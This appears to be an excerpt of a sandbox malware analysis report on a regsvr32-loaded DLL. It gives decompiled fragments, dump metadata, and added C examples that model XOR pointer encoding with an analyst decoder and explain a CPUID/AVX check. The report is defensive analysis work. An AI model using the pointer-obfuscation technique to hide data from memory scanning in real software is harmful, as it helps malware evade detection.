                                                                                                				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                				_t101 =  >  ? _t66 : _t76;
                                                                                                				_t6 = _t115 + 0x20; // 0x20
                                                                                                				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                                				_t7 = _t115 + 8; // 0x8
                                                                                                				r8d = _t7;
                                                                                                				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                				_t24 = E0000000118000878C(_t66, _t111);
                                                                                                				if (_t66 != 0) goto 0x800068e2;
                                                                                                				_t104 = _t76 + 4;
                                                                                                				r8d = 8;
                                                                                                				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                				_t129 = _t66;
                                                                                                				_t26 = E0000000118000878C(_t66, _t111);
                                                                                                				if (_t129 == 0) goto 0x800069ac;
                                                                                                				_t123 = _t129 + _t76 * 8;
                                                                                                				_t77 = _t129 + _t104 * 8;
                                                                                                				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                                				memset(_t52, _t26, 0 << 0);
                                                                                                				_t126 =  *0x80021010; // 0xeaed15642a89
                                                                                                				r8d = 0x40;
                                                                                                				asm("dec eax");
                                                                                                				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                				_t95 =  *0x80021010; // 0xeaed15642a89
                                                                                                				asm("dec eax");
                                                                                                				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                				_t96 =  *0x80021010; // 0xeaed15642a89
                                                                                                				asm("dec eax");
                                                                                                				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                				_t98 =  *0x80021010; // 0xeaed15642a89
                                                                                                				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                				asm("dec eax");
                                                                                                				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                                				goto 0x800069af;
                                                                                                				return 0xffffffff;
                                                                                                 			}

                                                                                                 Instruction address range of this function: 0x180006818 to 0x1800069c7
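The decompiled E00000001180006818 above never stores a raw heap pointer: every pointer it loads or writes (the three qwords at byte offsets 0, 8 and 16 of the structure it manages, and the element it appends) is XORed with a 64-bit value read from a global the decompiler shows as *0x80021010, which held 0xeaed15642a89 at analysis time. This is pointer encoding: a memory scan for heap addresses or for the element values finds nothing recognisable unless the key is applied. The C below is an added example written for this page, not code from the sample or from Joe Sandbox. It models that structure as a begin/end/capacity triple of encoded pointers with a grow-and-append operation that follows the decompiled control flow, and adds an analyst-side decoder. The growth policy and the use of calloc in place of the sample's unidentified helpers (E0000000118000A344, E0000000118000878C) are assumptions. One consequence worth knowing when reading a dump: an empty instance encodes three NULL pointers, so each of its slots is the key itself.

```c
/* Added example, not from the analysed sample: model of an XOR-encoded
 * begin/end/capacity pointer triple like the one E00000001180006818 updates. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* The decompilation reads the key from a global (*0x80021010, value
 * 0xeaed15642a89 in this dump).  Modelled as a plain global; how the sample
 * derives the value is not shown on the page. */
static uint64_t g_ptr_key = 0xeaed15642a89ULL;

/* Three encoded qwords at byte offsets 0, 8, 16: _t90[0], _t90[2], _t90[4]
 * of the decompiled `signed int*` (4-byte indices). */
typedef struct {
    uint64_t enc_begin;
    uint64_t enc_end;
    uint64_t enc_cap;
} obf_vec;

static uint64_t enc_ptr(const void *p) { return (uint64_t)(uintptr_t)p ^ g_ptr_key; }
static uint64_t *dec_ptr(uint64_t e)   { return (uint64_t *)(uintptr_t)(e ^ g_ptr_key); }

/* Empty vector: three encoded NULLs, i.e. enc(NULL) == key. */
void obf_vec_init(obf_vec *v)
{
    v->enc_begin = v->enc_end = v->enc_cap = enc_ptr(NULL);
}

/* (end - begin) >> 3, the same size computation the decompiler recovered. */
size_t obf_vec_count(const obf_vec *v)
{
    return (size_t)((uintptr_t)dec_ptr(v->enc_end) - (uintptr_t)dec_ptr(v->enc_begin)) >> 3;
}

/* Append one pointer.  When end == cap, allocate a larger zeroed buffer, copy,
 * then write the element and all three pointers back XOR-encoded
 * (`*_t123 = *(_t132[1]) ^ key` in the decompilation).  Returns 0 on success,
 * -1 (0xffffffff) on failure.  Growth policy here is an assumption. */
int obf_vec_push(obf_vec *v, const void *elem)
{
    uint64_t *begin = dec_ptr(v->enc_begin);
    uint64_t *end   = dec_ptr(v->enc_end);
    uint64_t *cap   = dec_ptr(v->enc_cap);
    size_t count = obf_vec_count(v);

    if (end == cap) {
        size_t new_cap = count + (count > 4 ? count : 4);   /* assumed policy */
        uint64_t *nb = calloc(new_cap, sizeof *nb);
        if (!nb) return -1;
        if (count) memcpy(nb, begin, count * sizeof *nb);
        free(begin);                      /* NULL on the first growth */
        begin = nb;
        end   = nb + count;
        cap   = nb + new_cap;
    }
    *end++ = enc_ptr(elem);               /* elements are encoded as well */
    v->enc_begin = enc_ptr(begin);
    v->enc_end   = enc_ptr(end);
    v->enc_cap   = enc_ptr(cap);
    return 0;
}

/* Analyst helper: given a dumped triple and the key, recover the element
 * pointers.  Returns the element count and writes up to `max` of them. */
size_t obf_vec_decode(const obf_vec *v, uint64_t key, const void **out, size_t max)
{
    uint64_t *begin = (uint64_t *)(uintptr_t)(v->enc_begin ^ key);
    uint64_t *end   = (uint64_t *)(uintptr_t)(v->enc_end ^ key);
    size_t n = (size_t)((uintptr_t)end - (uintptr_t)begin) >> 3;
    for (size_t i = 0; i < n && i < max; i++)
        out[i] = (const void *)(uintptr_t)(begin[i] ^ key);
    return n;
}

void obf_vec_free(obf_vec *v)
{
    free(dec_ptr(v->enc_begin));
    obf_vec_init(v);
}

/* An empty instance exposes the key in every slot. Returns 1 if so. */
int obf_vec_empty_leaks_key(void)
{
    obf_vec v;
    obf_vec_init(&v);
    return v.enc_begin == g_ptr_key && v.enc_end == g_ptr_key &&
           v.enc_cap == g_ptr_key && obf_vec_count(&v) == 0;
}

/* Push across one growth step, then decode with the key taken from the
 * empty instance, as an analyst would from a dump.  Returns 1 on a clean
 * round trip. */
int obf_vec_roundtrip(void)
{
    static int items[6];                  /* constructed sample targets */
    obf_vec v;
    obf_vec_init(&v);
    uint64_t leaked_key = v.enc_begin;
    for (int i = 0; i < 6; i++)
        if (obf_vec_push(&v, &items[i]) != 0) return 0;
    const void *out[6];
    size_t n = obf_vec_decode(&v, leaked_key, out, 6);
    int ok = (n == 6) && (leaked_key == g_ptr_key);
    for (size_t i = 0; ok && i < n; i++)
        ok = (out[i] == &items[i]);
    obf_vec_free(&v);
    return ok;
}
```

When carving such structures from the regsvr32 memory dumps listed in this report, the decoder needs only the key and the three encoded qwords; because the key is a single per-image value, recovering it once (from an empty instance, or as encoded_value XOR any one known plaintext pointer) decodes every instance in the process.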

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                 • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 485612231-0
                                                                                                • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                • Instruction ID: f24b41d4118684462d941c8a2cda840d0365acf9bd6cb22d8bfe286461e14f32
                                                                                                • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                • Instruction Fuzzy Hash: E051B2B090474E8FDB48CF68D48A5DE7FB0FB68398F214619E81596250D7B4D6A5CFC0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                • Instruction ID: 12be15f3218e1a311c8b4b91a87a5e15bab846c610b3e978c963e38bf5967b09
                                                                                                • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                • Instruction Fuzzy Hash: 455118719047498BDB48CF68C8895DEBFF1FB48318F11875CE89AA7260D7B89A44CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                • Instruction ID: b7a0703f361886732f71c7965c3360842d4eaf8d1a0bfbc6031caca0e337ae78
                                                                                                • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                • Instruction Fuzzy Hash: A051B4B090038E8FDB88CF68D88A5CE7BF0FB58358F104619F865A6250D3B8D664CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                • Instruction ID: 3148a14980ab4aff93d7bfce7efea3731f53904b5888f0c2d97ae5f3d7bf76e1
                                                                                                • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                • Instruction Fuzzy Hash: 94519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                • Instruction ID: 7889889aef9fdc3151f0008ed5c778dea0831adbf2613ef6ab2508600c8d36b0
                                                                                                • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                • Instruction Fuzzy Hash: CE41C3B090074E8FDB48DF64C88A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				void* _t25;
                                                                                                
                                                                                                				_t25 = __r8;
                                                                                                				r8d = 0;
                                                                                                				 *0x800223a8 = r8d;
                                                                                                				_t1 = _t25 + 1; // 0x1
                                                                                                				r9d = _t1;
                                                                                                				asm("cpuid");
                                                                                                				_v16 = r9d;
                                                                                                				_v16 = 0;
                                                                                                				_v20 = __ebx;
                                                                                                				_v12 = __edx;
                                                                                                				if (0 != 0x18001000) goto 0x80007101;
                                                                                                				asm("xgetbv");
                                                                                                				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                				r8d =  *0x800223a8; // 0x1
                                                                                                				r8d =  ==  ? r9d : r8d;
                                                                                                				 *0x800223a8 = r8d;
                                                                                                				 *0x800223ac = r8d;
                                                                                                				return 0;
                                                                                                			}


                                                                                                Instruction addresses mapped to the listing above: 0x1800070a0, 0x1800070a6, 0x1800070ab, 0x1800070b2, 0x1800070b2, 0x1800070b9, 0x1800070bb, 0x1800070c3, 0x1800070c9, 0x1800070cd, 0x1800070d3, 0x1800070d7, 0x1800070e1, 0x1800070eb, 0x1800070f6, 0x1800070fa, 0x180007101, 0x18000710f
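The routine at 0x1800070a0 above is the code behind the report's "Contains functionality to query CPU information (cpuid)" signature: a CPUID leaf-1 query, a test of ECX against the constant 0x18001000, and, only if that test passes, an XGETBV read whose result is stored into two adjacent globals. What follows is an added editor's example, not code from the report, from Joe Sandbox, or from the sample. It restates that check in readable C so the bit pattern can be recognised during triage. The reading of 0x18001000 as CPUID.1:ECX FMA (bit 12) | OSXSAVE (bit 27) | AVX (bit 28), and of XCR0 & 0x6 as the "OS saves XMM and YMM state" test, follows the Intel SDM bit assignments; that the decompiler's `if (0 != 0x18001000)` stands for `(ecx & 0x18001000) == 0x18001000`, and that the 32-bit-truncated `*0x800223a8` / `*0x800223ac` are a pair of ISA-availability flags at 0x1800223a8 / 0x1800223ac in the image loaded at 0x180000000, are the editor's assumptions. The function names, the 0/1 level encoding and the sample register values are constructed for the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Live-probe support: GCC/Clang on x86 use <cpuid.h> and an inline XGETBV;
 * MSVC on x86 uses <intrin.h>; any other target runs only the pure logic. */
#if (defined(__x86_64__) || defined(__i386__)) && (defined(__GNUC__) || defined(__clang__))
#include <cpuid.h>
#define LIVE_PROBE 1
#elif defined(_MSC_VER) && (defined(_M_X64) || defined(_M_IX86))
#include <intrin.h>
#define LIVE_PROBE 2
#else
#define LIVE_PROBE 0
#endif

/* CPUID.(EAX=1):ECX feature bits, per the Intel SDM vol. 2 (CPUID instruction). */
#define CPUID1_ECX_FMA     (1u << 12)
#define CPUID1_ECX_OSXSAVE (1u << 27)
#define CPUID1_ECX_AVX     (1u << 28)

/* The constant 0x18001000 in the decompiled routine is exactly FMA|OSXSAVE|AVX
 * (editor's reading of the listing, see the lead-in). */
#define AVX_FMA_MASK (CPUID1_ECX_FMA | CPUID1_ECX_OSXSAVE | CPUID1_ECX_AVX)

/* XCR0 (read with XGETBV, ECX=0): bit 1 = SSE/XMM state, bit 2 = AVX/YMM state.
 * Both must be set before AVX code may assume the OS preserves YMM registers. */
#define XCR0_SSE_STATE (1ull << 1)
#define XCR0_AVX_STATE (1ull << 2)
#define XCR0_YMM_MASK  (XCR0_SSE_STATE | XCR0_AVX_STATE)   /* 0x6 */

/* Step 1: may XGETBV be executed at all? XGETBV raises #UD unless CR4.OSXSAVE is
 * set, which CPUID.1:ECX.OSXSAVE mirrors; the routine also insists on AVX and FMA.
 * This is why the listing branches around the xgetbv when the mask test fails. */
bool cpuid1_allows_xgetbv(uint32_t cpuid1_ecx)
{
    return (cpuid1_ecx & AVX_FMA_MASK) == AVX_FMA_MASK;
}

/* Step 2: the value the two globals end up holding, in the constructed encoding
 * 0 = baseline x64 code paths only, 1 = AVX/FMA code paths may be used.
 * xcr0 is consulted only after step 1 passed, mirroring the early branch. */
int isa_level(uint32_t cpuid1_ecx, uint64_t xcr0)
{
    if (!cpuid1_allows_xgetbv(cpuid1_ecx))
        return 0;
    return (xcr0 & XCR0_YMM_MASK) == XCR0_YMM_MASK ? 1 : 0;
}

/* Live probe of the machine running the example. Returns isa_level() for it, or -1
 * when CPUID/XGETBV are unavailable (non-x86 build), so the pure logic above still
 * compiles and runs anywhere. */
int isa_level_live(void)
{
#if LIVE_PROBE == 1
    unsigned int eax, ebx, ecx, edx;
    uint64_t xcr0 = 0;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return -1;
    if (cpuid1_allows_xgetbv(ecx)) {
        uint32_t lo, hi;
        __asm__ __volatile__("xgetbv" : "=a"(lo), "=d"(hi) : "c"(0));
        xcr0 = ((uint64_t)hi << 32) | lo;
    }
    return isa_level(ecx, xcr0);
#elif LIVE_PROBE == 2
    int regs[4];
    uint64_t xcr0 = 0;
    __cpuid(regs, 1);
    if (cpuid1_allows_xgetbv((uint32_t)regs[2]))
        xcr0 = _xgetbv(0);
    return isa_level((uint32_t)regs[2], xcr0);
#else
    return -1;
#endif
}

int main(void)
{
    /* Constructed register values (not captured from the sandbox run) for the three outcomes. */
    printf("AVX+FMA CPU, OS saves YMM state -> level %d\n", isa_level(0x18001000u | 0x1u, 0x7u));
    printf("OSXSAVE clear, XGETBV would #UD -> level %d\n", isa_level(0x10001000u, 0x7u));
    printf("XCR0 lacks AVX state            -> level %d\n", isa_level(0x18001000u, 0x3u));
    printf("this machine                    -> level %d\n", isa_level_live());
    return 0;
}
```

Triage caveat: a CPUID/XGETBV sequence of this shape is what compiler runtimes emit to pick AVX versus baseline code paths, so on its own it is weak evidence of anything; the report's verdict rests on the Yara, multi-AV and C2 findings, not on this signature. The practical check is the one the example encodes: a mask of FMA|OSXSAVE|AVX followed by XCR0 & 6 is feature detection, whereas a loader that reads CPUID leaf 0 or leaf 0x40000000 for vendor or hypervisor strings is the pattern to look at for sandbox evasion.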

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: GestureInfo$CloseHandle
                                                                                                • String ID: 8
                                                                                                • API String ID: 372500805-4194326291
                                                                                                • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                • String ID: i
                                                                                                • API String ID: 3181456275-3865851505
                                                                                                • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                • String ID:
                                                                                                • API String ID: 1917832262-0
                                                                                                • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 66%
                                                                                                			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                				void* __rbx;
                                                                                                				void* __rdi;
                                                                                                				void* __rsi;
                                                                                                				void* __rbp;
                                                                                                				signed int* _t128;
                                                                                                				void* _t145;
                                                                                                				intOrPtr _t146;
                                                                                                				intOrPtr _t154;
                                                                                                				void* _t173;
                                                                                                				intOrPtr _t176;
                                                                                                				signed int _t177;
                                                                                                				signed int _t178;
                                                                                                				void* _t209;
                                                                                                				signed long long _t219;
                                                                                                				signed long long _t220;
